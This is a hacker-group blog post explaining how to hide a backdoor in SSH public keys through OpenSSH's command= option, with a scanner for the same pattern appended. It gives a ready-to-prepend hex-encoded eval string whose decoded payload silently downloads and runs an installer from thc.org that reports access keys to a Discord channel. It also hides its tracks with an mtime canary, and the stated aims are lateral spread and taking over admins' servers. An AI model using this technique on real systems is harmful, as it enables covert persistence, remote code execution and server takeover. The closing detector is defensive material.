Effective URL: https://blog.thc.org/infecting-ssh-public-keys-with-backdoors

THE HACKER'S CHOICE
INFECTING SSH PUBLIC KEYS WITH BACKDOORS


root · May 24, 2023



In this article, you will learn how to add a backdoor to the SSH Public Key. The
backdoor will execute whenever the user logs in. The backdoor hides as an
unreadable long hex-string inside ~/.ssh/authorized_keys or ~/.ssh/id_*.pub.

The source is available from GitHub.


TL;DR

Simply prepend any SSH Public Key with the following backdoor-string (everything
up until, but not including, the ssh-ed25519 AAAAC3Nzblah...):

no-user-rc,no-X11-forwarding,command="`###---POWERSHELL---`;eval $(echo …|xxd -r -ps);" ssh-ed25519 AAAAC3Nzblah....


Root is not needed.


WHAT'S THE PURPOSE

 1. For the lulz.

 2. Re-starts your backdoor after the server reboots (similar to infecting
    crontab or ~/.bashrc).

 3. Spread laterally: Admins are known to copy their SSH Public Keys to new
    servers. Own them.

 4. Cloud deployments often copy the Admin's Public Key to new instances - and
    now they copy your backdoor inside as well.


THE NITTY-GRITTY

OpenSSH has an unsung feature to execute a fixed command (instead of a shell)
when a user successfully logs in. This feature is used, for example, by AWS to
tell the customer not to log in as root:


no-port-forwarding,no-agent-forwarding,command="echo 'Please login as the user \"ubuntu\" rather than the user \"root\".';echo;sleep 10;exit 142" ssh-ed25519 AAAA...


The trick is to use OpenSSH's command= feature and silently start our backdoor
and afterwards execute the user's shell (with PTY) without the user noticing it.


THE DETAILS

Let's dissect the backdoor-string: The no-user-rc,no-X11-forwarding is a ruse to
throw off any prying eyes. It can be omitted.

The command= string is where the real magic happens. Here is a shorter version
of a simplified backdoor-string:


command="`###---POWERSHELL---`;eval $(echo 6563686f2048656c6c6f204261636b646f6f72|xxd -r -ps)"


OpenSSH executes the entire string between the two quotes "...".

The `###---POWERSHELL---`; is a ruse as well. It does nothing.

The next command, eval, executes the commands that are hidden inside the encoded
hex string.

Let's decode the hex string to reveal the actual commands that are being
executed:


$ echo 6563686f2048656c6c6f204261636b646f6f72 | xxd -r -ps
echo Hello Backdoor


This simplified backdoor only prints "Hello Backdoor" on log-in and then
terminates the SSH connection.

Our backdoor-string is more complex and decoded here:


[[ $(stat -c%Y /bin/sh) != $(stat -c%Y .ssh) ]] && {
    touch -r /bin/sh .ssh
    export KEY=""
    bash -c "$(curl -fsSL thc.org/sshx)" || bash -c "$(wget --no-verbose -O- thc.org/sshx)" || exit 0
} >/dev/null 2>/dev/null &
[[ -n $SSH_ORIGINAL_COMMAND ]] && exec $SSH_ORIGINAL_COMMAND
[[ -z $SHELL ]] && SHELL=/bin/bash
[[ -f /run/motd.dynamic ]] && cat /run/motd.dynamic
[[ -f /etc/motd ]] && cat /etc/motd
exec -a -$(basename $SHELL) $SHELL


Firstly, it uses a canary to make sure that the backdoor is only started once
and not on every login: if ~/.ssh and /bin/sh have the same modification time
(stat -c%Y prints the mtime in seconds), assume that the backdoor is already
installed. Otherwise stamp ~/.ssh with /bin/sh's mtime (touch -r) and execute
the backdoor thereafter.

The backdoor in this case is a backdoor-installer script pulled from
thc.org/sshx and executed in memory. It starts as a background process to not
slow down the user's log-in. The installer-script installs gsocket and if
successful reports the access key and system metrics to our discord channel.

Thereafter the backdoor-string checks if the user wanted to execute a command
rather than a shell.

The last four lines handle the normal case, where the user logs in to a shell:

 1. Set the SHELL variable if not set already.

 2. Simulate Linux's motd.

 3. Execute the user's shell.
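A defender-side check for the pattern this post describes, added here as an example that is not part of the original post or of the THC project's code: it parses authorized_keys lines with OpenSSH's option quoting rules (commas and escaped quotes inside command="..."), pulls out the command= option, decodes any long hex run of the kind that is piped into xxd -r -ps, and flags indicator strings such as curl, wget, eval, touch -r and exec in either the forced command or its decoded payload. It also checks the mtime canary the installer leaves behind (~/.ssh stamped with /bin/sh's modification time). The sample authorized_keys lines, the placeholder installer URL installer.example.invalid, the dummy key material and the indicator list are all constructed for this example and should be tuned per environment.

```python
"""Scan authorized_keys for command= options that hide a payload behind hex
encoding, and check the ~/.ssh mtime canary. Added example; sample lines and
indicator list are constructed, not taken from the original post."""
import os
import re
from dataclasses import dataclass, field

# Key types that may legitimately start a line without options.
KEY_TYPE_PREFIXES = ("ssh-ed25519", "ssh-rsa", "ssh-dss", "ecdsa-sha2-", "sk-")
# Substrings rarely seen in a legitimate forced command (assumption: tune per site).
INDICATORS = ("curl", "wget", "eval", "exec ", "touch -r", "bash -c", "/dev/tcp", "nohup")
# A run of 16+ hex digits, the shape of the string fed to `xxd -r -ps`.
HEX_RUN = re.compile(r"(?<![0-9a-fA-F])([0-9a-fA-F]{16,})(?![0-9a-fA-F])")


@dataclass
class Finding:
    lineno: int
    key_type: str
    command: str
    decoded: list = field(default_factory=list)     # hex payloads decoded to text
    indicators: list = field(default_factory=list)  # INDICATORS hit in command or payload

    @property
    def suspicious(self):
        return bool(self.decoded or self.indicators)


def split_options(line):
    """Split a line into (options, key-part). Options end at the first whitespace
    outside double quotes; backslash escapes inside quotes are skipped over."""
    if line.startswith(KEY_TYPE_PREFIXES):
        return "", line
    i, in_quote = 0, False
    while i < len(line):
        c = line[i]
        if in_quote and c == "\\":
            i += 2
            continue
        if c == '"':
            in_quote = not in_quote
        elif c in " \t" and not in_quote:
            break
        i += 1
    return line[:i], line[i:].lstrip()


def parse_options(opts):
    """Parse `a,b="x,y",c` into {"a": True, "b": "x,y", "c": True}."""
    items, cur, in_quote, i = [], [], False, 0
    while i < len(opts):
        c = opts[i]
        if in_quote and c == "\\" and i + 1 < len(opts) and opts[i + 1] == '"':
            cur.append('"')  # \" inside a quoted value is a literal quote
            i += 2
            continue
        if c == '"':
            in_quote = not in_quote
        elif c == "," and not in_quote:
            items.append("".join(cur))
            cur = []
        else:
            cur.append(c)
        i += 1
    if cur:
        items.append("".join(cur))
    result = {}
    for item in items:
        key, sep, value = item.partition("=")
        result[key.lower()] = value if sep else True
    return result


def decode_hex_runs(command):
    """Decode every long hex run in the forced command into text (skip non-text)."""
    out = []
    for run in HEX_RUN.findall(command):
        if len(run) % 2:
            continue
        try:
            out.append(bytes.fromhex(run).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def scan_authorized_keys(text):
    """Return one Finding per line that carries a command= option."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        opts, rest = split_options(line)
        options = parse_options(opts)
        if "command" not in options:
            continue
        command = options["command"]
        key_type = rest.split()[0] if rest else "?"
        f = Finding(n, key_type, command, decode_hex_runs(command))
        haystack = "\n".join([command, *f.decoded])
        f.indicators = [ind for ind in INDICATORS if ind in haystack]
        findings.append(f)
    return findings


def canary_matches(ssh_dir, reference="/bin/sh"):
    """The installer runs `touch -r /bin/sh .ssh` so it only fires once; an
    identical whole-second mtime (what `stat -c%Y` compares) is worth a look."""
    try:
        return int(os.stat(ssh_dir).st_mtime) == int(os.stat(reference).st_mtime)
    except FileNotFoundError:
        return False


# Constructed payload in the shape of the post's decoded script (placeholder URL).
PAYLOAD = ('[[ $(stat -c%Y /bin/sh) != $(stat -c%Y .ssh) ]] && { touch -r /bin/sh .ssh; '
           'bash -c "$(curl -fsSL http://installer.example.invalid/x)"; } >/dev/null 2>&1 &\n'
           'exec -a -bash /bin/bash')
PAYLOAD_HEX = PAYLOAD.encode().hex()
KEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyMaterialNotARealKey"  # dummy key
SAMPLE = "\n".join([  # constructed authorized_keys file
    "# constructed sample",
    KEY + " admin@laptop",
    r'no-port-forwarding,command="echo \"Please login as ubuntu\";sleep 10;exit 142" ' + KEY + " aws",
    'no-user-rc,command="`###---POWERSHELL---`;eval $(echo 6563686f2048656c6c6f204261636b646f6f72|xxd -r -ps)" ' + KEY + " hello",
    'command="eval $(echo ' + PAYLOAD_HEX + '|xxd -r -ps)" ' + KEY + " infected",
])

if __name__ == "__main__":
    for f in scan_authorized_keys(SAMPLE):
        print(f"line {f.lineno} {f.key_type} [{'SUSPICIOUS' if f.suspicious else 'ok'}] command={f.command!r}")
        for payload in f.decoded:
            print("  decoded:", payload.replace("\n", "\\n"))
        if f.indicators:
            print("  indicators:", ", ".join(f.indicators))
    print("canary on ~/.ssh:", canary_matches(os.path.expanduser("~/.ssh")))
```

Run it over a real file with scan_authorized_keys(open(path).read()); a line with a command= option is not bad by itself (the AWS-style notice above is reported but carries no indicators), so triage on the decoded payloads and indicator hits. The canary check is deliberately narrow: it only detects this specific installer's touch -r trick, and a coincidental mtime match is possible, so treat it as a lead rather than proof.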

Keep Hacking,

